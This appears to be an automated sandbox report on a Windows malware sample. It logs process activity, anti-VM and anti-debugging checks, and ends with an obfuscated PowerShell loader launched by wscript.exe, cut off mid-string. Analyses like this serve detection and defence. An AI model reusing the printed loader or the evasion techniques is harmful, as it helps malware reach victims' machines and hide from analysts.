            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Tries to detect Any.run
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 2768Thread sleep count: 39 > 30
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 2768Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4204Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7516Thread sleep count: 9929 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4204Thread sleep time: -60000s >= -30000s
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9341
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8733
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9929
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07526980 GetSystemInfo,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 30000
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSystem information queried: ModuleInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00B7E0F8 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$badeanstalt = """refliuefnbrcextapihjostnbu hyhfltdubsp su{hi cl an pa bapinacarziasomvo(cz[pasdetalrcaiennougde]ca`$udhbasud)fr;ag at ud ho af`$usbeuyaktnoepasbo sa=sn thnanenowbo-muogrbepjloeddcbethu tobpayvrtseela[al]po bd(me`$vahtnsde.relpeenonvegmatunhsl re/sk di2gi)ko;un ge ma is gefflolerwi(fe`$haiop=om0pe;fu ma`$phido ge-maltitse fa`$syhbesba.dolunedenscgdotunhca;do un`$reiom+re=be2du)va{fl pl re ad ot ta sp sk ho`$dobfeydetleegassm[fi`$geiaf/na2de]od ge=sa tr[recskounnlivkresirortbr]il:me:datdiodibboypatglesu(po`$ushhesph.bosfruafbnesmatunrpriponungla(il`$stipa,su jo2po)ca,bl af1sn6du)no;ma te un`$mibkryprtchegtspa[du`$syiun/tr2fi]mi ta=ha ah(fo`$sibbiyintopeovsol[kb`$spihe/ar2fr]fe ci-frbrexenophrti hy2st2re9la)lo;so le de ca vr}re un[muskutsqrlaiapnnogbl]pe[maschyinsdetpaenemst.vatbaekaxibtbi.reemanplcgeourdprimonprgsy]si:ko:raaudsakcwaifoisa.mogbaebuttasgutunrfriulningba(ba`$fobseypittheansid)li;bl}ga`$dehbrdsaluncir0sk=krhoutbebaf ry'bebre6te9spcbe9be6pr9gr1js8et0am8in8secenbca8co1in8ta9pr8cr9de'sy;lu`$plhrvdaflfocin1de=trhditzibve un'feakr8re8tacde8sl6gr9ag7is8xyasv9sp6sh8caahe8de3bl9an1unctibtebab2ha8smcur8subcudbu6lkdti7macmebsebde0as8trbch9ah6me8to4pr8ne3fr8in0boarebra8st4ti9ve1un8apcop9dk3bi8co0suacl8an8en0un9in1mo8dedan8peaud8wu1ra9ca6ba'fo;el`$lohbldnolsucbo2ne=tnhbltunbsp ne'siafi2sk8ti0di9ul1tyblo5ob9fi7no8byace8an6poala4da8bi1ka8im1wh9gt7lo8ge0rr9br6br9di6ar'fl;gr`$cyheidarlblcpr3pr=ovhentnobco ta'lebun6re9upcgu9sn6gn9fa1br8mo0da8pr8lycovbbebwa7sk9fo0sa8mabde9ev1af8kacba8oc8sc8he0nocobbfoatocde8sibsi9se1be8or0se9no7fl8huaou9ty5rabco6kr8sk0dd9se7as9ri3le8lacbr8we6ou8di0oc9be6dackabteaundpu8se4st8isber8si1ja8ng9li8sp0fobdi7ci8ex0vi8st3sl'sk;de`$flhpedjaljdcti4ki=klhsttprbfo ge'th9fi6af9sy1af9re7he8crcwi8fobst8ov2be'bl;al`$anhindaclfocbu5ta=ovhdetwhbun ca'udade2sy8pi0in9af1caari8ha8prano8sl1py9du0gn8ki9ud8po0muaundne8no4ud8epbac8vi1bj8sp9st8op0an'af;se`$orhbydgrlcicfo6hm=cehsktinbha di'fabin7apbin1wabbe6em9re5sa8no0wo8ai6mi8micba8pa4sh8el9noastbfo8un4ko8om8lo8ro0stcfo9chcco5syajudag8afcco8in1ps8in0frami7se9lactabbr6er8ticap8hu2pocep9suclo5mibre5ps9no0wa8ko7st8sa9po8fuccr8eg6no'in;hu`$inhcadudlrocst7mi=rehprtrobze da'nebpa7ri9di0un8chbgn9ea1ku8skcme8pr8su8di0ovcka9mocsa5swaud8un8bl4si8dibly8un4ur8gl2fa8fi0wh8ne1sc'wa;dd`$dehopdselnocaz8tr=byhditsibpy ev'avbun7di8tr0om8in3ma8fr9pr8ud0pr8fe6tr9br1sl8mi0gr8in1biave1hy8sv0ur8hv9pl8bl0kl8ph2ni8se4fa9fy1xy8ch0na'sa;dr`$cohafddolvocen9nd=pihkotasbef in'psaprcgl8mubfeata8fo8kp0un8re8co8uname9bl7at9glcfoafr8ny8elami8ek1fy9st0ek8mi9he8vr0me're;sv`$resactinykarrekgoeartunrhynwaemu0ov=inhaltetbbo 